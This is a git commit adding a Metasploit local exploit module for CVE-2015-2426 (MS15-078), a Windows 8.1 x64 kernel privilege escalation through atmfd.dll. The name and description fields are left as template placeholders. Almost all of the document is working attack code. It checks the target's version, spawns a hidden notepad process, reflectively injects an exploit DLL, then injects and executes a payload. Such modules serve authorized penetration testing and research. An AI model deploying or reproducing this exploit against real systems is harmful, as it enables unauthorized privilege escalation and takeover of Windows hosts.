Add exploit template
parent
4090c2c8ea
commit
b912e3ce65
Binary file not shown.
|
@ -0,0 +1,130 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/post/windows/reflective_dll_injection'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Priv
|
||||
include Msf::Post::Windows::Process
|
||||
include Msf::Post::Windows::FileInfo
|
||||
include Msf::Post::Windows::ReflectiveDLLInjection
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows ...',
|
||||
'Description' => %q{
|
||||
This module ...
|
||||
This module has been tested on vulnerable builds of Windows 8.1 x64.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Eugene Ching', # vulnerability discovery and exploit
|
||||
'Mateusz Jurczyk', # vulnerability discovery
|
||||
'Cedric Halbronn', # vulnerability and exploit analysis
|
||||
'juan vazquez' # msf module
|
||||
],
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Targets' => [
|
||||
[ 'Windows 8.1 x64', { } ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' => [
|
||||
['CVE', '2015-2426'],
|
||||
['MSB', 'MS15-078'],
|
||||
['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
|
||||
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
|
||||
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369']
|
||||
],
|
||||
'DisclosureDate' => 'Sep 02 2015',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
end
|
||||
|
||||
def check
|
||||
# Windows 8.1 (64-bit) / atmfd 5.1.2.238 (Works)
|
||||
|
||||
# I have only tested Windows 8
|
||||
if sysinfo['OS'] !~ /Windows 8/i
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
# I have only tested 64 bits versions
|
||||
if sysinfo['Architecture'] !~ /(wow|x)64/i
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
ver = "#{major}.#{minor}.#{build}.#{revision}"
|
||||
vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
|
||||
|
||||
return Exploit::CheckCode::Appears if Gem::Version.new(ver) == Gem::Version.new('5.1.2.238')
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
if is_system?
|
||||
fail_with(Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
check_result = check
|
||||
if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown
|
||||
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
|
||||
end
|
||||
|
||||
=begin
|
||||
if sysinfo['Architecture'] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
=end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
|
||||
begin
|
||||
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
rescue Rex::Post::Meterpreter::RequestError
|
||||
# Sandboxes could not allow to create a new process
|
||||
# stdapi_sys_process_execute: Operation failed: Access is denied.
|
||||
print_status('Operation failed. Trying to elevate the current process...')
|
||||
process = client.sys.process.open
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
||||
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status('Payload injected. Executing exploit...')
|
||||
process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue